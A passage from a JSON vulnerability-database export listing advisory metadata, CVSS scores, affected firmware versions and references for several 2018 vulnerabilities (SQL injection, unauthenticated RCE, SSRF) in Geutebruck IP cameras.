"id": "JVNDB-2018-003345"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-762"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137560"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003345"
},
{
"db": "NVD",
"id": "CVE-2018-7528"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/103474"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7528"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7528"
},
{
"trust": 0.3,
"url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06024"
},
{
"db": "VULHUB",
"id": "VHN-137560"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003345"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-762"
},
{
"db": "NVD",
"id": "CVE-2018-7528"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "e2e94500-39ab-11e9-a236-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06024"
},
{
"db": "VULHUB",
"id": "VHN-137560"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003345"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-762"
},
{
"db": "NVD",
"id": "CVE-2018-7528"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "IVD",
"id": "e2e94500-39ab-11e9-a236-000c29342cb1"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06024"
},
{
"date": "2018-03-22T00:00:00",
"db": "VULHUB",
"id": "VHN-137560"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003345"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-762"
},
{
"date": "2018-03-22T18:29:01.087000",
"db": "NVD",
"id": "CVE-2018-7528"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06024"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-137560"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003345"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-762"
},
{
"date": "2024-11-21T04:12:18.187000",
"db": "NVD",
"id": "CVE-2018-7528"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-762"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 In SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003345"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "IVD",
"id": "e2e94500-39ab-11e9-a236-000c29342cb1"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-762"
}
],
"trust": 0.8
}
}
VAR-201803-2221
Vulnerability from variot - Updated: 2024-11-23 21:53Unauthentication vulnerabilities have been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. GeutebruckIPCameras has a remote code execution vulnerability that an attacker can exploit to execute arbitrary code. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-2221",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-cam/efd-2250",
"scope": "eq",
"trust": 1.7,
"vendor": "geutebruck",
"version": "1.12.0.4"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "3.15.1"
},
{
"model": "g-cam\\/efd-2250",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "1.12.0.4"
},
{
"model": "topline topfd-2125",
"scope": "eq",
"trust": 0.9,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "g-cam/efd-2250",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.19"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "g cam efd 2250",
"version": "1.12.0.4"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "topfd 2125",
"version": "3.15.1"
}
],
"sources": [
{
"db": "IVD",
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06019"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003346"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-761"
},
{
"db": "NVD",
"id": "CVE-2018-7532"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003346"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
"sources": [
{
"db": "BID",
"id": "103474"
}
],
"trust": 0.3
},
"cve": "CVE-2018-7532",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-7532",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-06019",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-137564",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-7532",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7532",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-7532",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-06019",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-761",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "IVD",
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1",
"trust": 0.2,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-137564",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06019"
},
{
"db": "VULHUB",
"id": "VHN-137564"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003346"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-761"
},
{
"db": "NVD",
"id": "CVE-2018-7532"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unauthentication vulnerabilities have been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. GeutebruckIPCameras has a remote code execution vulnerability that an attacker can exploit to execute arbitrary code. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7532"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003346"
},
{
"db": "CNVD",
"id": "CNVD-2018-06019"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "IVD",
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
},
{
"db": "VULHUB",
"id": "VHN-137564"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7532",
"trust": 3.6
},
{
"db": "ICS CERT",
"id": "ICSA-18-079-01",
"trust": 3.4
},
{
"db": "BID",
"id": "103474",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-201803-761",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2018-06019",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003346",
"trust": 0.8
},
{
"db": "IVD",
"id": "E2E6FB10-39AB-11E9-8292-000C29342CB1",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-137564",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06019"
},
{
"db": "VULHUB",
"id": "VHN-137564"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003346"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-761"
},
{
"db": "NVD",
"id": "CVE-2018-7532"
}
]
},
"id": "VAR-201803-2221",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06019"
},
{
"db": "VULHUB",
"id": "VHN-137564"
}
],
"trust": 1.7456349166666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06019"
}
]
},
"last_update_date": "2024-11-23T21:53:17.778000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/en_EN.html"
},
{
"title": "Patch for Geutebruck IPCameras Remote Code Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/122847"
},
{
"title": "Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79347"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06019"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003346"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-761"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137564"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003346"
},
{
"db": "NVD",
"id": "CVE-2018-7532"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/103474"
},
{
"trust": 1.7,
"url": "https://randorisec.fr/0day-anonymous-rce-on-geutebruck-ip-cameras-again/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7532"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7532"
},
{
"trust": 0.3,
"url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06019"
},
{
"db": "VULHUB",
"id": "VHN-137564"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003346"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-761"
},
{
"db": "NVD",
"id": "CVE-2018-7532"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06019"
},
{
"db": "VULHUB",
"id": "VHN-137564"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003346"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-761"
},
{
"db": "NVD",
"id": "CVE-2018-7532"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "IVD",
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06019"
},
{
"date": "2018-03-22T00:00:00",
"db": "VULHUB",
"id": "VHN-137564"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003346"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-761"
},
{
"date": "2018-03-22T18:29:01.137000",
"db": "NVD",
"id": "CVE-2018-7532"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06019"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-137564"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003346"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-761"
},
{
"date": "2024-11-21T04:12:18.600000",
"db": "NVD",
"id": "CVE-2018-7532"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-761"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck IP Cameras Remote code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06019"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-761"
}
],
"trust": 0.6
}
}
VAR-201803-2210
Vulnerability from variot - Updated: 2024-11-23 21:53A server-side request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could lead to proxied network scans. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. There is a server-side request forgery vulnerability in GeutebruckIPCameras, which can be exploited by attackers. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company. An attacker could exploit this vulnerability to scan proxy networks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-2210",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-cam/efd-2250",
"scope": "eq",
"trust": 1.7,
"vendor": "geutebruck",
"version": "1.12.0.4"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "3.15.1"
},
{
"model": "g-cam\\/efd-2250",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "1.12.0.4"
},
{
"model": "topline topfd-2125",
"scope": "eq",
"trust": 0.9,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "g-cam/efd-2250",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.19"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "g cam efd 2250",
"version": "1.12.0.4"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "topfd 2125",
"version": "3.15.1"
}
],
"sources": [
{
"db": "IVD",
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06022"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003342"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-765"
},
{
"db": "NVD",
"id": "CVE-2018-7516"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003342"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
"sources": [
{
"db": "BID",
"id": "103474"
}
],
"trust": 0.3
},
